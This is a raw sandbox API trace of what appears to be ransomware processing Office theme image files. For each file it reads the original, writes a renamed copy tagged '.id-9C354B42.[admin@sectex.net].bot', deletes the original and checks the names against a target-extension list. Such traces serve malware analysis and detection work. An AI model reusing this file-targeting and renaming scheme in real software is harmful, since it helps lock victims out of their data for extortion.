	[0042.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.910] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.910] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0042.910] GetLastError () returned 0x0
	[0042.910] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x80f1, lpOverlapped=0x0) returned 1
	[0042.912] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x8100, lpOverlapped=0x0) returned 1
	[0042.913] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.913] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0042.913] SetEndOfFile (hFile=0x200) returned 1
	[0042.914] CloseHandle (hObject=0x200) returned 1
	[0042.914] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.914] SetEndOfFile (hFile=0x1f8) returned 1
	[0042.915] CloseHandle (hObject=0x1f8) returned 1
	[0042.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.916] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1
	[0042.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.916] lstrlenW (lpString=".doc") returned 4
	[0042.916] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.916] lstrlenW (lpString=".docx") returned 5
	[0042.916] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.916] lstrlenW (lpString=".pdf") returned 4
	[0042.916] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.916] lstrlenW (lpString=".xls") returned 4
	[0042.916] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.916] lstrlenW (lpString=".xlsx") returned 5
	[0042.916] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.916] lstrlenW (lpString=".ppt") returned 4
	[0042.916] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.916] lstrlenW (lpString=".zip") returned 4
	[0042.916] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.916] lstrlenW (lpString=".rar") returned 4
	[0042.916] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.916] lstrlenW (lpString=".bz2") returned 4
	[0042.916] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.916] lstrlenW (lpString=".7z") returned 3
	[0042.916] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.916] lstrlenW (lpString=".dbf") returned 4
	[0042.916] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".1cd") returned 4
	[0042.917] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".jpg") returned 4
	[0042.917] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".doc") returned 4
	[0042.917] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString=".docx") returned 5
	[0042.917] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.917] lstrlenW (lpString=".pdf") returned 4
	[0042.917] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString=".xls") returned 4
	[0042.917] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.917] lstrlenW (lpString=".xlsx") returned 5
	[0042.917] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.917] lstrlenW (lpString=".ppt") returned 4
	[0042.917] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".zip") returned 4
	[0042.917] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.917] lstrlenW (lpString=".rar") returned 4
	[0042.917] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.917] lstrlenW (lpString=".bz2") returned 4
	[0042.917] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString=".7z") returned 3
	[0042.917] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".dbf") returned 4
	[0042.917] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.917] lstrlenW (lpString=".1cd") returned 4
	[0042.918] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77
	[0042.918] lstrlenW (lpString=".jpg") returned 4
	[0042.918] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.918] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0042.918] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0042.918] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.918] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1925) returned 1
	[0042.918] CloseHandle (hObject=0x1f8) returned 1
	[0042.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20
	[0042.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.918] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.918] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.919] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.654] GetLastError () returned 0x0
	[0043.654] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x785, lpOverlapped=0x0) returned 1
	[0043.656] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x790, lpOverlapped=0x0) returned 1
	[0043.657] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.657] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.657] SetEndOfFile (hFile=0x204) returned 1
	[0043.657] CloseHandle (hObject=0x204) returned 1
	[0043.658] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.658] SetEndOfFile (hFile=0x1f8) returned 1
	[0043.658] CloseHandle (hObject=0x1f8) returned 1
	[0043.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.659] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1
	[0043.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.659] lstrlenW (lpString=".doc") returned 4
	[0043.659] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.659] lstrlenW (lpString=".docx") returned 5
	[0043.659] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.659] lstrlenW (lpString=".pdf") returned 4
	[0043.659] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.659] lstrlenW (lpString=".xls") returned 4
	[0043.659] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.659] lstrlenW (lpString=".xlsx") returned 5
	[0043.659] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.659] lstrlenW (lpString=".ppt") returned 4
	[0043.659] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.659] lstrlenW (lpString=".zip") returned 4
	[0043.659] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.659] lstrlenW (lpString=".rar") returned 4
	[0043.659] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.659] lstrlenW (lpString=".bz2") returned 4
	[0043.659] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.659] lstrlenW (lpString=".7z") returned 3
	[0043.659] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".dbf") returned 4
	[0043.660] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".1cd") returned 4
	[0043.660] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".jpg") returned 4
	[0043.660] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".doc") returned 4
	[0043.660] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.660] lstrlenW (lpString=".docx") returned 5
	[0043.660] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.660] lstrlenW (lpString=".pdf") returned 4
	[0043.660] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString=".xls") returned 4
	[0043.660] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString=".xlsx") returned 5
	[0043.660] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.660] lstrlenW (lpString=".ppt") returned 4
	[0043.660] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".zip") returned 4
	[0043.660] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString=".rar") returned 4
	[0043.660] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.660] lstrlenW (lpString=".bz2") returned 4
	[0043.660] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.660] lstrlenW (lpString=".7z") returned 3
	[0043.660] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.660] lstrlenW (lpString=".dbf") returned 4
	[0043.660] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.661] lstrlenW (lpString=".1cd") returned 4
	[0043.661] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76
	[0043.661] lstrlenW (lpString=".jpg") returned 4
	[0043.661] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.661] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.661] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.663] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1287) returned 1
	[0043.663] CloseHandle (hObject=0x1f8) returned 1
	[0043.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20
	[0043.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.664] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.664] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.665] GetLastError () returned 0x0
	[0043.665] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x507, lpOverlapped=0x0) returned 1
	[0043.667] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x510, lpOverlapped=0x0) returned 1
	[0043.668] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.668] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.668] SetEndOfFile (hFile=0x204) returned 1
	[0043.668] CloseHandle (hObject=0x204) returned 1
	[0043.669] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.669] SetEndOfFile (hFile=0x1f8) returned 1
	[0043.669] CloseHandle (hObject=0x1f8) returned 1
	[0043.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.670] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1
	[0043.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.670] lstrlenW (lpString=".doc") returned 4
	[0043.670] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.670] lstrlenW (lpString=".docx") returned 5
	[0043.670] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.670] lstrlenW (lpString=".pdf") returned 4
	[0043.670] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.670] lstrlenW (lpString=".xls") returned 4
	[0043.670] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.670] lstrlenW (lpString=".xlsx") returned 5
	[0043.670] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.670] lstrlenW (lpString=".ppt") returned 4
	[0043.670] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.670] lstrlenW (lpString=".zip") returned 4
	[0043.670] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.670] lstrlenW (lpString=".rar") returned 4
	[0043.670] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.670] lstrlenW (lpString=".bz2") returned 4
	[0043.670] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.670] lstrlenW (lpString=".7z") returned 3
	[0043.670] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString=".dbf") returned 4
	[0043.671] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString=".1cd") returned 4
	[0043.671] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString=".jpg") returned 4
	[0043.671] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString=".doc") returned 4
	[0043.671] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.671] lstrlenW (lpString=".docx") returned 5
	[0043.671] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.671] lstrlenW (lpString=".pdf") returned 4
	[0043.671] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.671] lstrlenW (lpString=".xls") returned 4
	[0043.671] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.671] lstrlenW (lpString=".xlsx") returned 5
	[0043.671] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.671] lstrlenW (lpString=".ppt") returned 4
	[0043.671] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.671] lstrlenW (lpString=".zip") returned 4
	[0043.672] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.672] lstrlenW (lpString=".rar") returned 4
	[0043.672] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.672] lstrlenW (lpString=".bz2") returned 4
	[0043.672] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.672] lstrlenW (lpString=".7z") returned 3
	[0043.672] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.672] lstrlenW (lpString=".dbf") returned 4
	[0043.672] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.672] lstrlenW (lpString=".1cd") returned 4
	[0043.672] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76
	[0043.672] lstrlenW (lpString=".jpg") returned 4
	[0043.672] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.672] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.672] lstrlenW (lpString="THMBNAIL.PNG") returned 12
